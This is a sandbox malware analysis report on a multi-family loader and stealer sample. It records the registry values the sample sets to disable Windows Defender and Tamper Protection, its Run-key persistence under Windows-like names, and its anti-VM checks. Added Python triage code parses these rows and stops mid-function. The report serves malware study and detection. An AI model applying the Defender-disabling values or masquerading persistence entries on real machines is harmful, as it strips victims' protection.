Malware Analysis Report

2025-01-22 14:54

Sample ID 241206-cqe7ksvmew
Target 1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe
SHA256 1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e
Tags
amadey gcleaner lumma orcus stealc ta505 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e

Threat Level: Known bad

The file 1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner lumma orcus stealc ta505 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan

Stealc family

Orcus

Ta505 family

Lumma Stealer, LummaC

Orcus family

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies Windows Defender Real-time Protection settings

GCleaner

Amadey

Gcleaner family

Stealc

Amadey family

Lumma family

TA505

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Orcurs Rat Executable

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks computer location settings

Checks BIOS information in registry

Identifies Wine through registry keys

Executes dropped EXE

Windows security modification

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

AutoIT Executable

Drops file in Windows directory

Enumerates physical storage devices

Program crash

System Location Discovery: System Language Discovery

Unsigned PE

Modifies registry class

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Runs net.exe

Suspicious use of SendNotifyMessage

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 02:16

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 02:16

Reported

2024-12-06 02:19

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3564 created 3364 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

TA505

ta505

Ta505 family

ta505

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
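The drop paths in the table above follow a few fixed directory conventions, and grouping by them exposes the packaging chain rather than a flat list of 20 executables. The Python below is an added example written for this page, not sandbox or report code; SAMPLE_PATHS are the paths listed above, embedded as constructed input. The stage labels are analyst heuristics: IXPnnn.TMP directories are where the Windows wextract (IExpress) self-extractor unpacks, one per nesting level; is-XXXXX.tmp is an Inno Setup temporary directory; the ten-digit directories are the task-download layout seen in Amadey reports (the report tags Amadey but does not attribute individual drops to it).

```python
"""Group dropped executables by the directory convention they were written to.

Added example for this report; SAMPLE_PATHS are copied from the
"Executes dropped EXE" table (constructed input)."""
import re
from collections import defaultdict

# Checked in order; the first match wins, so the specific Temp layouts come
# before the generic "some subdirectory of Temp" and "directly in Temp" cases.
STAGE_PATTERNS = [
    (re.compile(r"\\Temp\\IXP(\d{3})\.TMP\\", re.I), "wextract_sfx"),       # IExpress/wextract layer n
    (re.compile(r"\\Temp\\(is-[A-Z0-9]{5}\.tmp)\\", re.I), "inno_setup"),   # Inno Setup temp dir
    (re.compile(r"\\Temp\\(\d{10})\\", re.I), "numbered_download"),         # ten-digit task dirs (Amadey layout, heuristic)
    (re.compile(r"\\Temp\\([^\\]+)\\", re.I), "temp_subdir"),
    (re.compile(r"\\Temp\\([^\\]+)$", re.I), "temp_root"),
    (re.compile(r"\\AppData\\Local\\([^\\]+)\\", re.I), "appdata_local"),
]


def classify_drop(path):
    """(stage, token) for a dropped-file path; token is the matched dir or file name."""
    for pattern, stage in STAGE_PATTERNS:
        m = pattern.search(path)
        if m:
            return stage, m.group(1)
    return "other", path


def group_drops(paths):
    """stage -> sorted unique paths."""
    groups = defaultdict(set)
    for p in paths:
        groups[classify_drop(p)[0]].add(p)
    return {stage: sorted(ps) for stage, ps in groups.items()}


def sfx_layers(paths):
    """Number of nested wextract layers (IXP000 = outer package, IXP001 = inner)."""
    idx = [int(tok) for stage, tok in map(classify_drop, paths) if stage == "wextract_sfx"]
    return max(idx) + 1 if idx else 0


SAMPLE_PATHS = [
    r"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe",
    r"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe",
    r"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe",
    r"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe",
    r"C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe",
    r"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe",
    r"C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp",
    r"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe",
    r"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe",
    r"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe",
    r"C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe",
    r"C:\Users\Admin\AppData\Local\Temp\491505\Dr.com",
    r"C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe",
    r"C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe",
    r"C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe",
    r"C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe",
    r"C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe",
    r"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe",
    r"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe",
    r"C:\Users\Admin\AppData\Local\asm\mi.exe",
]

if __name__ == "__main__":
    print("wextract layers:", sfx_layers(SAMPLE_PATHS))
    for stage, paths in group_drops(SAMPLE_PATHS).items():
        print(stage)
        for p in paths:
            print("   ", p)
```

Two nested wextract layers (IXP000 and IXP001) plus an Inno Setup directory means the original file is a self-extractor wrapping a second self-extractor and a decoy installer; the numbered directories are populated later by the resident loader, which is why they carry the later-stage families.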

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
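The VirtualBox ACPI, BIOS-version, Wine and Geo\Nation tables are all host fingerprinting, and ranking processes by how many distinct checks each performs separates the resident loader from single-purpose payloads. The Python below is an added example for this page, not report or sandbox code. It parses flattened table rows in the shape shown above; SAMPLE_ROWS are copied from those tables as constructed input, and the check names are the author's labels, not sandbox signature names.

```python
"""Rank processes in a sandbox registry-event dump by how many distinct
environment checks (VM, BIOS, Wine, locale) each one performs.

Added example for this report; SAMPLE_ROWS are copied from the signature
tables above and are constructed input, not a live feed."""
import re
from collections import Counter, defaultdict

# One flattened row: "<description> <registry key> <process path> N/A".
# Both the key and the process path may contain spaces, so the process column
# is anchored on its "C:\" prefix and on the trailing "N/A" (empty Target column).
ROW_RE = re.compile(
    r"^(?P<desc>Key opened|Key value queried)\s+"
    r"(?P<key>\\REGISTRY\\.+?)\s+"
    r"(?P<proc>C:\\.+?)\s+N/A$"
)

# Registry reads whose only purpose in a dropped binary is fingerprinting the
# host. Geo\Nation is a locale check, the usual basis for "do not run in
# country X" exclusions in stealers.
EVASION_CHECKS = {
    "vm_acpi_vbox": lambda k: "\\ACPI\\DSDT\\VBOX__" in k,
    "bios_version": lambda k: k.endswith(("\\SystemBiosVersion", "\\VideoBiosVersion")),
    "wine":         lambda k: k.endswith("\\Software\\Wine"),
    "geo_nation":   lambda k: k.endswith("\\Geo\\Nation"),
}


def parse_row(line):
    """Return (registry_key, process_path), or None for a row of another shape."""
    m = ROW_RE.match(line.strip())
    return (m["key"], m["proc"]) if m else None


def classify(key):
    """Name of the evasion check a registry access belongs to, or None."""
    for name, matches in EVASION_CHECKS.items():
        if matches(key):
            return name
    return None


def score_processes(lines):
    """Map each process path to a Counter of the evasion checks it performed."""
    hits = defaultdict(Counter)
    for line in lines:
        parsed = parse_row(line)
        if parsed is None:
            continue
        key, proc = parsed
        check = classify(key)
        if check:
            hits[proc][check] += 1
    return hits


def rank(hits):
    """Process paths ordered by distinct checks, then total reads, then name."""
    return sorted(hits, key=lambda p: (-len(hits[p]), -sum(hits[p].values()), p))


SAMPLE_ROWS = [
    r"Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A",
    r"Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A",
    r"Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A",
    r"Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A",
    r"Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A",
    r"Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A",
    r"Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A",
    # Noise row with a space in the process path: a CPU query by Firefox, not an evasion check.
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A",
]

if __name__ == "__main__":
    hits = score_processes(SAMPLE_ROWS)
    for proc in rank(hits):
        print(len(hits[proc]), "checks,", sum(hits[proc].values()), "reads:", proc, dict(hits[proc]))
```

On the rows above skotes.exe comes out on top with all four check types, which is consistent with it being the component that decides whether to fetch the later stages at all; a single VBOX__ open by a stage-one extractor is much weaker evidence on its own.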

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1dd8bdd825.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012576001\\1dd8bdd825.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\69efc78da7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012577001\\69efc78da7.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b3da59fcc7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012578001\\b3da59fcc7.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f56e441c8f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012575001\\f56e441c8f.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
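The Real-Time Protection, TamperProtection and Run/RunOnce tables above are all "Set value" events and can be triaged together. The Python below is an added example for this page, not report or sandbox code; SAMPLE_ROWS are copied from those tables as constructed input, and the list of Windows component names is a short illustrative heuristic. It separates the wextract_cleanup RunOnce entries, which the Windows self-extractor registers itself to delete its IXPnnn.TMP directory, from the Run values that point into the user profile, and flags value names that borrow a Windows component name (SmartScreen, COM Surrogate). One caveat: the sandbox records the attempted registry write; whether the Defender policy values took effect on a victim depends on the Tamper Protection state, which is exactly what the Features\TamperProtection = 0 write is trying to change.

```python
"""Classify 'Set value' registry events: Defender policy tampering, Tamper
Protection switched off, and Run/RunOnce persistence.

Added example for this report; SAMPLE_ROWS are copied from the tables above
(constructed input). WINDOWS_COMPONENT_NAMES is an illustrative heuristic."""
import re

# Row shape: Set value (int|str) <key> = "<escaped value>" <process> N/A
# The value column is escaped the C way (backslash-backslash, backslash-quote),
# so it is matched as a run of non-quote characters or backslash escapes.
SET_RE = re.compile(
    r'^Set value \((?P<type>int|str)\)\s+'
    r'(?P<key>\\REGISTRY\\.+?) = "(?P<val>(?:[^"\\]|\\.)*)"\s+'
    r'(?P<proc>C:\\.+?)\s+N/A$'
)

DEFENDER_RTP = "\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\"
TAMPER_KEY = "\\Microsoft\\Windows Defender\\Features\\TamperProtection"
RUN_KEYS = ("\\CurrentVersion\\Run\\", "\\CurrentVersion\\RunOnce\\")
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")
# Names of genuine Windows components (illustrative list). An autostart with one
# of these names that launches a binary from a user-writable directory is a masquerade.
WINDOWS_COMPONENT_NAMES = {"smartscreen", "com surrogate", "dllhost", "runtime broker"}


def unescape(s):
    """Undo the sandbox's escaping of the value column (backslash-x becomes x)."""
    return re.sub(r"\\(.)", r"\1", s)


def image_of(command):
    """Executable a Run value launches: the quoted path, else the first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def parse_set(line):
    m = SET_RE.match(line.strip())
    if not m:
        return None
    return {"key": m["key"], "value": unescape(m["val"]), "process": m["proc"]}


def classify(ev):
    key, val = ev["key"], ev["value"]
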